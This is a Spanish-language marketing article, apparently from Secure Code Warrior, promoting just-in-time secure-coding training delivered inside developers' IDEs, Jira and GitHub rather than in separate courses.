Lo más importante es que los desarrolladores necesitan realizar más trabajo en menos tiempo y proporcionar código seguro y de alta calidad. Al incorporar formación contextualizada sobre vulnerabilidades de código, se optimiza el flujo de trabajo y la experiencia de los desarrolladores, y se mejora su retención. ¡Escuche a Larry explicar cómo ahorrar esas 40 horas de formación!

Secure Code Warrior y proporciona a sus equipos de desarrollo y seguridad un aprendizaje contextualizado y altamente relevante.

¿Le interesa la demostración? Reserve una a continuación.

‍

El ciclo de vida del desarrollo de software (SDLC) parece bastante inocuo; es un proceso, y todos los que trabajamos en el ámbito del software nos unimos para hacer realidad la magia y enviar todos esos productos digitales sin los que la sociedad no puede vivir.

Excepto que... si alguna vez has formado parte de un proyecto de desarrollo de software, sabrás que suele ser un guante, con muchas misiones que conquistar y dragones que matar. Es divertido durante un tiempo, pero el agotamiento es real, y la demanda de software nos hace trabajar a la velocidad de la luz en el mejor de los casos, especialmente al equipo de desarrollo.

Ahora imagina que se les lanza otra tarea imprescindible... la responsabilidad de la seguridad en los elementos del proyecto que tocan. Esto, en el peor de los casos, puede hacer que el castillo de naipes se derrumbe para algunos individuos, pero el escenario más realista es que simplemente no se haga una prioridad, y los asuntos considerados más urgentes para superar la línea tengan prioridad. Y cuando la mayoría de los desarrolladores no están capacitados para codificar de forma segura (especialmente si sus gerentes tampoco dan prioridad a la seguridad), no es de extrañar que veamos frecuentes violaciones de datos, lanzamientos de aplicaciones defectuosas, y una seria rotación entre los profesionales de la seguridad que llegan al punto de ruptura bajo una avalancha de código con errores.

Los desarrolladores necesitan un defensor de la seguridad de las aplicaciones.

Si se tiene en cuenta el escenario anterior, se puede entender por qué la seguridad se pone en la cesta de "demasiado difícil" durante el proceso de codificación, y se deja al equipo de seguridad para que lo solucione. Hay demasiados plazos que compiten entre sí, no hay suficiente formación y no hay ninguna razón real para preocuparse por la seguridad con todo lo demás. Sin embargo, hay demasiada demanda de código para que este statu quo continúe. Y ahí es donde los desarrolladores de superélite pueden destacar entre sus compañeros, aprender nuevas habilidades y, lo que es más importante, construir un código más seguro.

Sin embargo, es importante recordar que la gestión de la seguridad del software no recae exclusivamente en los desarrolladores, sino que sigue siendo competencia del equipo de seguridad de las aplicaciones (que, al trabajar con desarrolladores concienciados en materia de seguridad, tendrán más espacio para respirar en lugar de tener que arreglar los errores comunes una y otra vez). Un proceso DevSecOps que funcione requiere que todos los miembros del equipo tengan el apoyo y las herramientas que necesitan para compartir la responsabilidad de la seguridad, y el tipo correcto de formación es primordial. Equilibrar el conjunto adecuado de herramientas y formación requiere la perspicacia de los profesionales de AppSec dispuestos a trabajar estrechamente con los desarrolladores para inspirarlos e impulsar un cambio positivo.

La formación disruptiva es más molesta que efectiva, y cualquier cosa que repela a los desarrolladores no va a funcionar. Una solución integrada en el IDE o en el gestor de incidencias, centrada en el conocimiento en forma de bocado, es una alternativa que pone a su disposición la información adecuada en el momento en que la necesitan.

Así es como funciona en acción:

Justo a tiempo, no "por si acaso".

Elaprendizaje contextual y práctico es, con mucho, la forma más eficaz de formar, con trozos del tamaño de un bocado entregados justo cuando tienen más sentido. Esto se denomina a veces formación "Just in Time" (JiT), y es muy potente para los desarrolladores que aprenden a codificar de forma segura.

Con orígenes en los principios de fabricación ajustada de Toyota, la formación JiT está diseñada para activarse en función de las necesidades, en contexto, cuando más importa. ¿Un desarrollador acaba de escribir algo que parece tener permisos inadecuados? ¿Y si se ha abierto una pequeña puerta trasera que permite a un atacante ejecutar código de forma remota? Será mucho más memorable si los desarrolladores pueden acceder a los conocimientos cuando los necesiten, en lugar de tener que buscar en la documentación de Confluence o buscar en Google algo que se haya tratado en la formación.

El aprendizaje "justo a tiempo" es la antítesis del aprendizaje "por si acaso"; aunque este último es la forma más común de impartir conocimientos, simplemente no es eficiente. Debemos facilitar que los desarrolladores se comprometan con las mejores prácticas de codificación segura, y que vean el beneficio de actualizarse para su carrera mientras mantienen el enfoque en los objetivos clave en los que están trabajando en este momento.

Deja de hacer que los desarrolladores persigan la formación.

Ya sabemos que hay demasiadas cosas que hacer en un día de trabajo, así que ¿qué incentivo tienen los desarrolladores para desplazarse a un aula, o cambiar de contexto para pasar por cinco pasos para acceder a una formación estática basada en la teoría?

El consenso general es que todo lo que la mayoría de las organizaciones están haciendo no es terriblemente eficaz si la cantidad de vulnerabilidades que causan las violaciones de datos es algo a tener en cuenta. El informe sobre investigaciones de fugas de datos de 2020 de Verizon especificaba que el 43% de las fugas de datos podían atribuirse a vulnerabilidades de la web. Los desarrolladores no están recibiendo una formación eficaz, ni en la educación superior, ni como parte de las medidas de actualización en el lugar de trabajo. Si lo hicieran, las vulnerabilidades más comunes, como la inyección de SQL y el path traversal de la vieja escuela, no se explotarían para obtener datos importantes, y la escasez de habilidades de ciberseguridad no estaría fuera de control.

Entonces, sabiendo que este es el clima actual en el que los desarrolladores reciben formación y se familiarizan con la seguridad, ¿por qué nos sorprende el mal resultado? Podría tener un efecto, positivo, tanto para el desarrollador como para la organización, asegurar una experiencia de formación más fluida, más integrada y menos discordante, donde sea accesible en los espacios en los que realmente trabajan, como Jira, GitHub y en el IDE. La industria simplemente necesita avanzar y hacer que la concienciación sobre la seguridad sea mucho más fácil, en un entorno en el que ya no es un lujo.

¿Listo para asegurar el flujo de trabajo de desarrollo?

Los desarrolladores concienciados con la seguridad son venerados por sus habilidades y por la protección que pueden ofrecer a las organizaciones desde la fase de creación del código. La seguridad ya no es opcional, especialmente con las multas del GDPR, las normativas de cumplimiento de PCI-DSS, la gobernanza del NIST... y la posibilidad de ser demandado en una gran demanda colectiva multimillonaria, a la Equifax.

Un enfoque integrado podría ser el catalizador para empezar a ganarse a los desarrolladores con un aprendizaje menos disruptivo, y crear algunas vías para profundizar en courses, formar a los campeones de la seguridad y, en general, inspirar esa responsabilidad compartida que necesitamos para mantener los datos del mundo seguros y sanos.

Descargue ahora las herramientas de integración para Jira y GitHub, y díganos lo que piensa.